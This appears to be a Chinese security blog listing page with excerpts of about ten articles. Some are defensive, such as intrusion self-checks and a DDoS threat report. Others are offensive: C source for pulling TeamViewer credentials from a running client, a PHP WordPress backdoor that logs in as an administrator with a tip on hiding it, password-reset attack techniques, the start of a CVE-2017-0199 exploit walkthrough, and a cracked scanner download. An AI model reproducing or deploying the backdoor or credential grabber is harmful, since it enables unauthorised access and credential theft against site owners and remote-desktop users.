“疫苗门”涉事公司官网被黑:不搞你,对不起祖国的花朵

“疫苗门”风波持续发酵,“疫苗事件”的话题讨论也持续占据微博热搜榜第一。今天早上,涉事公司之一的长生生物科技有限公司官网(http://china.cs-vaccine.com/)被黑客攻击,并配文表示:不搞你,对不起祖国的花朵。有意思的是,网站title被修改成“Anonymous”,不知大家是否还记得那个全球最大的黑客组织“匿名者”……被黑期间,网站被挂上两张图,一张是这几天在微博、朋友圈刷屏的那张那张表情包,另一张则是李克强总理对疫苗事件强硬的回应:必须给全国人民一个明明白白的交代。另外一

快速自检电脑是否被黑客入侵过(Linux版)

之前写了一篇《快速自检电脑是否被黑客入侵过(Windows版)》, 这次就来写写Linux版本的。前言严谨地说, Linux只是一个内核, `GNU Linux`才算完整的操作系统, 但在本文里还是用通俗的叫法,把`Ubuntu`,`Debian`,`RedHat`,`CentOS`,`ArchLinux`等发行版都统称为`Linux`.本文里所说的方法不仅对Linux的发行版适用, 部分方法对`Mac OSX`操作系统也是适用的.异常的帐号和权限如果黑客曾经获得过命令运行的机会, 对方往往会想

快速自检电脑是否被黑客入侵过(Windows版)

我们经常会感觉电脑行为有点奇怪, 比如总是打开莫名其妙的网站, 或者偶尔变卡(网络/CPU), 似乎自己"中毒"了,但X60安全卫士或者X讯电脑管家扫描之后又说你电脑"非常安全", 那么有可能你已经被黑客光顾过了. 这种时候也许要专业的取证人员出场,但似乎又有点小提大作. 因此本文介绍一些低成本的自检方法, 对于个人用户可以快速判断自己是否已经被入侵过.1. 异常的日志记录通常我们需要检查一些可疑的事件记录, 比如:“Event log&nbsp

一件获取运行中的TeamViewer的账号和密码(附源码)

#define WIN32_LEAN_AND_MEAN#include <windows.h>#include <iostream>#pragma comment( lib, "kernel32" )#pragma comment( lib, "user32" )
 int status = 0;
 BOOL CALLBACK EnumMainTVWindow(HWND hwnd, LPARAM lParam){
        const int BufferSize = 1024;
        char BufferContent[BufferSize] = "";
        SendMessage(hwnd, WM_GETTEXT, (WPARAM)BufferSize, (LPARAM)BufferContent);
       
        if (status == 1)
        {
                printf("%s\n", BufferContent);
                status = 0;
        }
 
        if (strstr(BufferContent, "Allow Remote Control") != NULL)


任意用户密码重置的10种姿势

以前安全测试最爱挖的就是任意用户密码重置,今天看了carry_your师傅在ichunqiu上的视频文字总结一下任意用户密码重置的10种姿势:1,短信验证码可爆破;视频案例中输入手机号码、图片验证码就可以获取短信验证码,并且新密码也是在一个页面中,但是输入短信验证码之后,后端有个请求会判断短信验证码是否正确,错误的话页面会有提醒。攻击者可以用这个请求来爆破验证码,获取到正确的短信验证码之后就可以重置任意用户密码了。缺陷主要是两个方面,第一,未对短信验证码的失效时间进行限制;第二,功能设计存在缺陷

Talos揭露中国在线DDOS平台的崛起 | 歪果仁眼中的中国黑产一景

在过去的几个月里,Talos发现中国网站上提供在线DDoS攻击服务的中国网站数量呈上升趋势。许多网站的布局和设计几乎完全相同:提供了一个简单的界面,用户可以在其中选择目标主机、端口、攻击方法和攻击时间。此外,这些网站大部分是在近六个月内注册的。然而,网站由不同名称的群体注册和运作,而且这些人之间也经常相互攻击。Talos试图对这些平台对创建者进行研究,并分析这种情势为何会迅速普及。在这篇文章中,主要描述了中国的DDoS行业的概况以及正在发生的趋向于在线攻击平台的威胁景观,研究了最近创建的DDoS

AWVS(Acunetix Web Vulnerability Scanner)v11.x 破解版下载

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!该破解版仅用于个人尝鲜测试使用用,请支持正版!Acunetix Web Vulnerability Scanner(简称AWVS)是一款知名的网络漏洞扫描工具,它通过网络爬虫测试你的网站安全,检测流行安全漏洞。由于官方下载正版不敢提供直接升级了,所以只有等小伙伴分享出来,再把正版安装包放网盘吧,由于官方的试用版是不带有注册功能的,建议先卸载老版本,再通过本站下载

AWVS(Acunetix Web Vulnerability Scanner)v11.x 破解版

OFFICE OLE2LINK(CVE-2017-0199)漏洞利用详解

漏洞概述FireEye最近公布了一个OFFICE 0day,在无需用户交互的情况下,打开word文档就可以通过hta脚本执行任意代码。经过研究发现,此漏洞的成因主要是word在处理内嵌OLE2LINK对象时,通过网络更新对象时没有正确处理的Content-Type所导致的一个逻辑漏洞。漏洞利用方法首先准备一台apache服务器,web根目录下保存一个1.rtf文件,内容如下:test789<script>var objShell = new A

手把手教你如何搭建自己的渗透测试环境

介绍白帽子是指个体发起的黑客攻击,找到系统潜在的可能被恶意黑客利用的的漏洞或脆弱点。在目标不知情或者没得到授权的情况下发起黑客攻击是非法的。所以通常是建立一个自己的实验室,练习黑客技术。在这个实验室里,你能看到如何创建一个自己的黑客环境,练习各种各样的黑客攻击技术。我们将会探讨不同类型的虚拟系统,构建一个虚拟网络,在虚拟环境中运行试用版的操作系统,搭建一个有漏洞的web应用程序,安装Kali LInux,执行渗透测试。所需条件:VMware WorkstationWindows XP系统映像Ka

猥琐的wordpress后门

一个可以自动调用管理员帐号登录wordpress后台的方法。
<?php

    require('../../../wp-blog-header.php'); //我基本都是放到3级目录下。也可以放到根目录,但是容易被发现。
    $query_str = "SELECT ID FROM $wpdb->users";
    $user_ids = $wpdb->get_results($query_str);
    foreach ($user_ids as $uid) {
        $user_id = $uid->ID;
        if (user_can($user_id, 'administrator')) {
            $user_info = get_userdata($user_id);
            $user_login = $user_info->user_login;
            wp_set_current_user($user_id, $user_login);